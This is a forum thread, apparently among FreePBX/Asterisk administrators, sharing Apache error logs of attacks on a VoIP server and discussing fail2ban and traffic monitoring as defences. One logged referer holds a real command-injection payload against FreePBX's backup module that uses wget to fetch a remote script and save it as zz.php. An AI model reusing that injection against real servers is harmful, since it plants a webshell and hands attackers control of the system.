[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/ama.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/Do_Me.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/ama.php

You will see that over days that he is probing for known vulnerabilities (the old hands will perhaps recognize the vulnerabilities), then a couple of days later he tries to inject unsuccessfully

http://1337s.cc/index.php

The interesting correlation is

cat /var/log/httpd/error_log |grep MAYET
[Fri Jun 12 11:00:46 2015] [error] [client 81.10.94.241] File does not exist: /var/www/html/favicon.ico, referer: http://162.42.215.183/admin/modules/backup/page.backup.php?action=deletedataset&dir=%27;wget%20http://184.107.105.35/classes/ELMAYET_ELMAYET.txt%20%20-O%20zz.php;%20echo%20%27mission%20done
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php

One directed google for MAYET would find a guy in South Africa who is an expert in VOIP and security (I’m sure his work was stolen), but if you read the script

http://184.107.105.35/classes/ELMAYET_ELMAYET.txt

(zz.php) it would really be quite devastating if it got on your machine, here apache-nohome jail would have caught him on Thu Jun 11 16:30:26 2015. You should reasonably use a long bantime to mitigate the threat.

Yes this was a failed attempt, but as you see the risk is real and on this machine a related but more robust attack would expose the server to penetration needlessly.

Food for thought maybe? or just should we sweep it under the rug :wink:

(to this and the next message)
Interesting, indeed.

Can we treat this in stages, probably?

  • pre-requisite: set up wireshark or something like that on separate machine (or separate VM maybe even better), adjacent to the one you’re looking at, to intercept / look at packet flow incoming to the one where you’ll be installing FreePBX.
  • at the very least record packet source and destination (and src/dst ports) in timely correlation with
  • distro setup (take note of FreePBX servers/mirrors accessed)
    (- system set up, first ever GUI / dashboard /access/login)
  • system up, NOT running asterisk
  • system up, running asterisk but no chan-sip/chan-pjsip / not listening to port 5060
  • system up, running asterisk with channel module as described above (no configuration but a login account on the GUI)
  • (what the above is supposed to track/find, is : are there any hosts on the 'net other than FreePBX Project/Sangoma/Digium etc, that your test machine is sending ANY sort of packets TO at ANY point ? Even the smallest ones.)

Like I said, I find it quite unbelievable, that a newly setup system would ‘just’ get itself under potential bruteforcing or DDoS attack ‘just like that’ without something ‘from inside’ of it letting the invaders know it’s there. Note that ‘something inside’ may also be completely unrelated to Asterisk.

Hope this helps & that it’s not crazy talk :wink:

You could do all that crazy stuff but the result would not reveal anthing nefarious.
Any unsolicited connection on any port that your server has open will be serviced This includes tcp 5038,22,80,8088 and the one that isymphony uses, also udp 53,69,123,4569,5060 and 5061 on this machine.

Whether you find it believable or not, connections WILL eventually arrive on those ports. At this point in time this machine has only filtered ssh tcp/22 successfully 80 times for 2 hosts out of +14000 total connections from 227 different hosts, a vast majority of which where to to udp/5060 but a significant minority to http “files” and “scripts” that don’t exist.